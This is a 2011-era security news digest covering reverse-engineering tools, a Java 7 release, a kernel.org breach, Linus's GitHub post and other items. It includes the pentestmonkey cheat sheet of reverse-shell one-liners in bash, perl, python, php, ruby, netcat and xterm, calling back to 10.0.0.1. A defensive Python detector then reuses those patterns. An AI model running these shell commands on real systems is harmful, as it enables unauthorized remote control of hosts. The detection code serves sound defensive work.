OllyDbg [4][5] is an application-level debugger. The OllyDbg interface shows the disassembly, hex dump, stack, and CPU registers. Additionally, OllyDbg supports run tracing, conditional breakpoints, PE header viewing, hex editing, and plug-in support. At first startup, OllyDbg asks to set up a User Data Directory (UDD) and a Plugins directory. The UDD is used to keep debugged-application-specific information like breakpoints and other information, and obviously you need to save plugins in the Plugins directory. It provides a wide range of Debugging Options like break on new module or when a thread is created, how to process exceptions etc. OllyDbg supports setting of Hardware Breakpoints, Software Breakpoints, Memory Breakpoints and even Conditional Breakpoints. OllyDbg supports plugins to enhance its functionality.

Olly Advanced Plugin

There were some bugs reported with Olly v1.10 related to the string parsing routine and parsing of faulty executables. This plugin fixes most of these bugs. Some malware samples are loaded with Anti-Debugging techniques [7]; the Olly Advanced plugin helps to counter most of them.

Olly Dump Plugin

Olly Dump is used to dump debugged process memory. You could trace the packed file till it reaches the original entry point and then dump the unpacked version of the file from process memory. It provides options to rebuild the Import Address Table (IAT).

Olly Script Plugin

OllyScript is a plugin that lets you automate OllyDbg by writing scripts in an assembly-like language. Many tasks involve a lot of repetitive work just to get to some point in the debugged application. By using this plugin you could write a script once and it could be used with other similar samples. OpenRCE [8] hosts dozens of scripts that are helpful to find the original entry point (OEP) of many packers.

IDA Pro

IDA Pro is a powerful disassembler that presents the disassembly in a well-organized format and shows a Graph view of the selected function. However, it is less frequently used as a debugger in the reverse engineers' community, where OllyDbg steals the top rank. IDA Pro's features include hex editing, string extraction, and import and export viewing. IDA Pro also features a window for viewing all of the functions called by a program, and provides accurate analyses of the program, summarizing them in a color-coded bar at the top of the screen, which classifies the various sections of the program's code. The figure below shows IDA Pro's interface, including the disassembly and the color-coded analysis bar at the top of the screen. The titles of the other windows are visible on the tabs above the disassembly. IDA Pro supports a wide variety of processors like ARM, DEC, Intel, Motorola etc.

IDA Pro provides a selection of debuggers:
  • Bochs
  • Win Debugger
  • GDB
  • WinDbg

IDA Pro with the Bochs emulator makes an interesting combination that is used to debug an Operating System starting from the booting process, and it is helpful in debugging even ROM BIOS and Master Boot Record code. Analysis done on a particular sample, comments added and functions marked could be saved as an .idb file.

IDA Shortcuts

Below is the list of some important IDA Shortcuts; for the complete list please visit reference [9].
  • Enter: Go to address or variable
  • Esc: Go back to previous location
  • ; : Add inline comment
  • INSERT | SHIFT-; : Add comment
  • N: Rename label, variable, functions etc.
  • X: Show cross reference
  • M: Substitute enum
  • CTRL-W: Save changes (don't forget to!)

Extending IDA

IDA supports writing IDC Scripts, which is a very C-like language, on top of the powerful IDA disassembler. The functionality of the disassembler could be utilized even through Python scripts and by writing plugins.

FLIRT: Fast Library Identification and Recognition Technology

One of the challenges with disassembly of programs developed with modern high level languages is to identify library functions. One may end up spending considerable time going through these functions. On the other hand, identification of library functions can considerably ease the analysis of a program. IDA comes with FLIRT to recognize the standard library functions.

One must understand the power of each tool to choose the appropriate tool for a specific requirement during reverse engineering.

References
  1. Portable Executable File Format – A Reverse Engineer View (Tuts 4 You: Downloads / Portable Executable Format (PE) / Portable Executable File Format)
  2. Hiew (Hiew homepage)
  3. FAR Manager (Far Manager Official Site)
  4. OllyDbg (OllyDbg v1.10)
  5. OllyDbg Quick Start Guide (Tuts 4 You: Downloads / OllyDbg Tutorials / OllyDbg Quick Start Guide)
  6. OllyDbg Plugins (OpenRCE)
  7. Anti-Debugging: http://lilxam.free.fr/repo/hacking/Windows%20Anti-Debug%20Reference.pdf
  8. Olly Scripts (OpenRCE)
  9. IDA Shortcuts: http://www.hex-rays.com/idapro/freefiles/IDA_Pro_Shortcuts.pdf

Source: Tools for Reverse Engineering and Malware Analysis | ClubHACK Magazine
  13. Hijacking Facebook Fan Pages

It's easier to hijack a Facebook page than you would expect, because of sloppy security from the social network. The question is - will Facebook do anything about it?

Video: http://www.securitytube.net/video/2210

In other words: if you are an administrator of a page, you can remove the other administrators, the "original" administrators.
  14. Java 7 Officially Released

Published: 2011-09-05, Last Updated: 2011-09-05 13:44:59 UTC by Raul Siles (Version: 2)

Oracle officially released Java 7, including some security updates and several new features and enhancements. Thanks ISC reader Alex for notifying us about it. The new Java 7 version coexists with the latest Java 6 Update 27 version and is available for download from the Oracle web site, Oracle Technology Network for Java Developers, and still makes use of different installers for the 32 and 64-bit versions for all operating systems (Linux, Solaris & Windows).

As you can see in the release notes, the main security enhancements affect the JSSE (Java Secure Socket Extension) and TLS communications, including TLS v1.1 and v1.2 as well as Server Name Indication (SNI) support.

Java 7 does not remove any previous Java versions; I guess this is the intended behavior as this is a major release. From a security perspective, if Java 7 is installed (using Windows as the sample platform) on a system that already has Java 6 installed, both versions will remain, so if you only want to run the latest version, ensure you uninstall any previous versions (as we had to do in the past but with the same major release) and do not leave vulnerable Java 6 releases around.

Considering Java is one of the most targeted pieces of client software today, be ready for future updates on both Java 6 and Java 7 in your IT environments (perhaps Java 6u28 and Java 7u1), and plan in advance how to manage them.

UPDATE 1: Let's clarify this diary post title a little bit based on txISO's comment (thanks!). If you consider Java to be officially released only when it is available at java.com, then Java has not been officially released yet (see quote on 3rd comment below).
However, if you consider that Java 7 is available out there, not only in its JDK version (what I consider the version for developers), but in the JRE (Java Runtime Environment) version too, then IMHO it has been released - although only at oracle.com. Besides that, if you are old Java school and go to the old java.sun.com, you will be redirected to the oracle.com page where Java 7 is available to the public. For our ISC audience, officially or not, get ready for Java 7 as soon as possible: it is out there.

Source: ISC Diary | Java 7 Officially Released
  15. skipfish

A fully automated, active web application security reconnaissance tool. Key features:

High speed: pure C code, highly optimized HTTP handling, minimal CPU footprint - easily achieving 2000 requests per second with responsive targets.

Ease of use: heuristics to support a variety of quirky web frameworks and mixed-technology sites, with automatic learning capabilities, on-the-fly wordlist creation, and form autocompletion.

Cutting-edge security logic: high quality, low false positive, differential security checks, capable of spotting a range of subtle flaws, including blind injection vectors.

The tool is believed to support Linux, FreeBSD, MacOS X, and Windows (Cygwin) environments.

Docs: SkipfishDoc - skipfish - Project documentation - web application security scanner - Google Project Hosting
Primer: lcamtuf's blog: Understanding and using skipfish
Download: http://skipfish.googlecode.com/files/skipfish-2.03b.tgz

Source: skipfish - web application security scanner - Google Project Hosting
  16. Reverse Shell Cheat Sheet

If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell. If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either throwing back a reverse shell or binding a shell to a TCP port. This page deals with the former.

Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared. The examples shown are tailored to Unix-like systems. Some of the examples below should also work on Windows if you substitute “/bin/sh -i” with “cmd.exe”. Each of the methods below is aimed to be a one-liner that you can copy/paste. As such they’re quite short lines, but not very readable.

Bash
Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

PERL
Here’s a shorter, feature-free version of the perl-reverse-shell:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
There’s also an alternative PERL reverse shell here.

Python
This was tested under Linux / Python 2.7:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP
This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
If you want a .php file to upload, see the more featureful and robust php-reverse-shell.
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat
Netcat is rarely present on production systems and even if it is, there are several versions of netcat, some of which don’t support the -e option.
nc -e /bin/sh 10.0.0.1 1234
If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

xterm
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
xterm -display 10.0.0.1:1
To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1
You’ll need to authorise the target to connect to you (command also run on your host):
xhost +targetip

Source: Reverse Shell Cheat Sheet | pentestmonkey
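From the defender's side, the same one-liners are exactly what a rule over command-execution telemetry (auditd EXECVE records, shipped shell history) should flag. The following added Python example is not part of the cheat sheet: it runs detection rules derived from the patterns listed above over constructed command records in a made-up "host user: command" format. The rule names, the regexes and the sample lines are assumptions for the demo, not from any real product.

```python
"""Added example: detection logic for the reverse-shell one-liners in the
cheat sheet above, run over constructed command records. Every rule is
derived from a pattern the cheat sheet itself shows; the log lines are made up."""
import re
from typing import List, Tuple

# Each rule: (name, regexes that must ALL match the command part of a record).
# Two-part rules (socket + exec, mkfifo + nc) exist so that an innocent
# "import socket" or a lone "mkfifo" does not raise an alert on its own.
RULES: List[Tuple[str, List[re.Pattern]]] = [
    ("bash_dev_tcp", [re.compile(r"/dev/tcp/\d")]),
    ("netcat_exec", [re.compile(r"\bn(c|cat)\b.*\s-e\s")]),
    ("mkfifo_netcat_relay", [re.compile(r"\bmkfifo\b"), re.compile(r"\bn(c|cat)\b")]),
    ("script_socket_exec", [re.compile(r"\b(socket|fsockopen|TCPSocket)\b"),
                            re.compile(r"\b(exec|dup2)\b")]),
    ("xterm_remote_display", [re.compile(r"\bxterm\b.*-display\s+\S+:\d")]),
]


def classify(command: str) -> List[str]:
    """Return the names of every rule whose regexes all match the command."""
    return [name for name, pats in RULES if all(p.search(command) for p in pats)]


def scan(records: List[str]) -> List[Tuple[int, str]]:
    """Scan 'host user: command' records; return (record index, rule name) per alert."""
    alerts: List[Tuple[int, str]] = []
    for i, rec in enumerate(records):
        # Constructed record format: everything after the first ': ' is the command line.
        command = rec.split(": ", 1)[1] if ": " in rec else rec
        for name in classify(command):
            alerts.append((i, name))
    return alerts


# Constructed sample records: benign admin activity mixed with cheat-sheet patterns.
SAMPLE_RECORDS = [
    "web01 www-data: ls -la /var/www/html",
    "web01 www-data: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1",
    "web01 www-data: python -c 'import socket;print(socket.gethostname())'",
    "web01 deploy: nc -zv 10.0.0.2 22",
    "web01 www-data: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f",
    "web01 www-data: php -r '$sock=fsockopen(\"10.0.0.1\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "web01 www-data: xterm -display 10.0.0.1:1",
    "web01 deploy: mkfifo /var/run/app.fifo",
]


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_RECORDS):
        print(f"[{rule}] {SAMPLE_RECORDS[idx]}")
```

The benign records (a port check with `nc -zv`, a Python one-liner that only imports `socket`, a plain `mkfifo`) produce no alert, which is the point of requiring two independent tokens for the scripted and relay variants; a single-token rule on `socket` or `nc` would page on routine administration.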
  17. OSSEC is an Open Source Host-based Intrusion Detection

OSSEC is an Open Source Host-based Intrusion Detection System. It performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting and active response. It runs on most operating systems, including Linux, MacOS, Solaris, HP-UX, AIX and Windows. A list with all supported platforms is available here.

Docs: Documentation
Download: http://www.ossec.net/main/downloads
  18. Linux Kernel Moves To Github

From Linus Torvalds <>
Date Sun, 4 Sep 2011 16:27:25 -0700
Subject Linux 3.1-rc5

So it's been another week, and it's time for another -rc. However, master.kernel.org is still down, and there really hasn't been a ton of development going on, so I considered just skipping a week. But hey, the whole point (well, *one* of the points) of distributed development is that no single place is really any different from any other, so since I did a github account for my divelog thing, why not see how well it holds up to me just putting my whole kernel repo there too?

So while kernel.org is down for the count, let's just see how github does:

https://github.com/torvalds/linux.git

NOTE! One thing to look out for when you see a new random public hosting place usage like that is to verify that yes, it's really the person you think it is. So is it? You can take a few different approaches:

(a) Heck, it's open source, I don't care who I pull from, I just want a new kernel, and not having a new update from kernel.org in the last few days, I *really* need my new kernel fix. I'll take it, because I need to exercise my CPU's by building randconfig kernels. Besides, I like living dangerously.

(b) Yeah, the email looks like it comes from Linus, and we all know that SMTP cannot possibly be spoofed, so it must be him.

(c) Ok, I can fetch that tree, and I know that Linus always does signed tags, and I can verify the 3.1-rc5 tag with Linus known public GPG key that I have somewhere. If it matches, I don't care who the person doing the release announcement is, I'll trust that Linus signed the tree

(d) I'll just wait for kernel.org to feel better.

Whatever works for you.

One thing to note: If you just do

git pull https://github.com/torvalds/linux.git

you probably won't get the tags, since it's not your origin branch. So do

git fetch --tags <...>

too, so that you get not only the actual changes, but the tag that you can verify too.
And I *would* suggest you just pull into an existing tree, rather than clone a new copy. I bet the github people will appreciate that.

Anything worth saying about the changes themselves? The appended shortlog pretty much speaks for itself: there really hasn't been much excitement on the kernel development front.

Now, if you want to talk to me about dive logging software, that's a whole different kettle of fish..

Linus

Source: Linux Kernel Moves To Github - Slashdot
Info: https://lkml.org/lkml/2011/9/4/92
  19. Window shopping goes high tech with gesture recognition The Fraunhofer Institute's interactive shop window lets people use gestures to learn more about products on display German researchers have given a new meaning to window shopping. At the IFA consumer electronics show in Berlin the Fraunhofer Heinrich Hertz Institute showed a prototype that lets shoppers learn more about what's in a store display window when the store is closed. Called the Interactive Shop Window the system consists of a flat screen monitor and a motion tracker positioned behind the glass of a store's front window. When window-shoppers stand in front of the window, they can point at a product they want. Then the display box holding the product will light up and information for the object will be shown on the screen. Window-shoppers can then view it in different colors or sizes, or learn more about it. The system is controlled by the window-shopper's gestures, which are captured using motion tracking technology that the Fraunhofer team has been working on for a decade. The institute is looking for partners to further the technology and one day change the look of department store windows. "We're searching for partners in the industry to bring it as a new product," said Paul Chojacki, in charge of interactive media for the Fraunhofer Heinrich Hertz Institute. "We have some bigger companies in Germany who are interested in this," he said, although he didn't say which ones. Before the system is ready for a commercial debut there are still some bugs that need to be worked out. For example, the pointer will sometimes jump around the screen, or something will be selected that wasn't intended. Chojacki said one of the biggest challenges was making sure the motion tracking system filtered out reflections on the store front glass. "The window is a problem for us because it's reflecting light and pictures," he said. "We found a solution that is working very well right now." 
Another problem for the team will be teaching passers-by how to use the system because it isn't all that intuitive. Users have to stand in exactly the right spot and make gestures in a defined area for the motion tracker to see them. Chojacki said that the Fraunhofer motion tracker could be replaced by a Microsoft Kinect sensor, but that theirs is specially tailored for the project.

Fraunhofer had been working on its motion tracker well before the Kinect premiered, and has shown it at previous IFA shows. In 2008 it was used in the iPointPresenter project, which allowed users to control a mouse cursor using gestures. At the time it could only track objects on a 2D plane. In 2009 the team upgraded the system for the iPoint3D project, which recognized gestures on the X, Y and Z axes. Chojacki was also involved with iPoint3D.

Source and video: Window shopping goes high tech with gesture recognition - webcams, retail, popular science, peripherals, monitors, Input devices, industry verticals, IFA, Fraunhofer Heinrich Hertz Institute - Techworld
  20. Cosmos - C# Open Source Managed Operating System

Welcome to the Cosmos home page. Cosmos is an operating system project implemented completely in CIL compliant languages. The team is committed to using C#, however any .NET language can be used.

Latest News
Aug 3, 2010 - MS5 is here!

Why Cosmos?
Because it's fun! Do we need any more reasons? Well if you do, here is a list of many real world scenarios we envision.

How does Cosmos work?
Cosmos includes a compiler (IL2CPU, which is part of Cosmos) that reads the input file (usually the shell) and Cosmos libraries and compiles the resulting IL to x86 code. IL2CPU has a layer for cross platform and we plan to support other processors and platforms, including x64. IL2CPU also supports certain extension methods which allow C# code to interact directly with the CPU, registers, and ports in the kernel. IL2CPU contains some inline assembler, but there are no ASM files that need to be linked in. Currently IL2CPU first outputs raw asm files (with IL comments) and then processes them through nasm (a free assembler). Later we plan to emit directly to binary. For more information with pretty pictures please read this article at CodeProject.

Source: Cosmos - Cosmos
Getting started: Getting Started - Cosmos
  21. Buffer overflows - they appeared 20 years ago. Are they no longer relevant?
  22. I think that next week some order will be put among the VIPs.
  23. Kernel.org Attackers May Have Slipped Up

See: https://threatpost.com/en_us/blogs/kernelorg-linux-site-compromised-083111

The attack that compromised some high-value servers belonging to kernel.org--but not the Linux kernel source code--may have been the work of hackers who simply got lucky and didn't realize the value of the servers that they had gotten their hands on. The attack, in short, could have been far worse.

Researchers who have talked with the kernel.org staff about some of the details of the attack said that none of it sounds as if the attackers necessarily knew what they had stumbled upon or what damage they could have potentially caused. The attackers made a couple of mistakes that enabled the administrators at kernel.org to discover the breach and stop it before any major damage occurred. First, they used a known Linux rootkit called Phalanx that the admins were able to detect. And second, the attackers set up SSH backdoors on the compromised servers, which the admins also discovered. Had the hackers been specifically targeting the kernel.org servers, the attack probably would've looked quite different.

"It really does seem that the attackers didn't know what boxes they were on. It's the same kind of techniques that you'd use on any random Linux boxes," said Jon Oberheide, a security researcher and co-founder of Duo Security. "That often happens in an automated or semi-automated way. They compromised some credentials, got onto one box, moved to another one and so on. It's likely that they got onto one machine, had some credentials that they could use on another box and kind of went from there."

The attack on kernel.org, which is the main distribution point for the Linux kernel source code, was discovered on Aug. 29 by administrators who noticed some odd error messages and began investigating.
What they eventually found was that sometime in mid-August--likely around Aug. 12--an attacker got access to one of the kernel.org servers and inserted a Trojan startup script. They also loaded the Phalanx rootkit and remote SSH backdoors. If the attackers had known they were going after the Linux kernel source code to begin with, Oberheide said, some of those tactics wouldn't have made any sense.

"That off-the-shelf rootkit is how the admins noticed the attack. They saw these weird error messages. If it was tailored, they wouldn't have seen any log messages," he said. "If you were really trying to backdoor the Linux source code, you wouldn't bother with SSH backdoors. You've already reached your goal."

Kernel.org staffers said in a message detailing the attack that they don't believe any of the Linux kernel source code was accessed or modified.

Source: https://threatpost.com/en_us/blogs/kernelorg-attackers-may-have-slipped-090111
  24. Facebook Blind Sql Injection

facebook.com account settings update: the POST data parameter _user is not filtered and has SQL injection vulnerabilities. Using Tamper Data and watching the POST and GET requests to the server, the update request is vulnerable.

"Jester, GHoST61, MadHunTeR, SuSKuN, LifeSteaLeR, Prens, Vp"
Email: turksistemguvenligi@gmail.com
Twitter: @TurkAslanlari
Facebook: Türk Aslanlar
Friendfeed: Türk Aslanlar
Friendfeed: SQL Injection - FriendFeed

Video: http://www.securitytube.net/video/2204

Yes...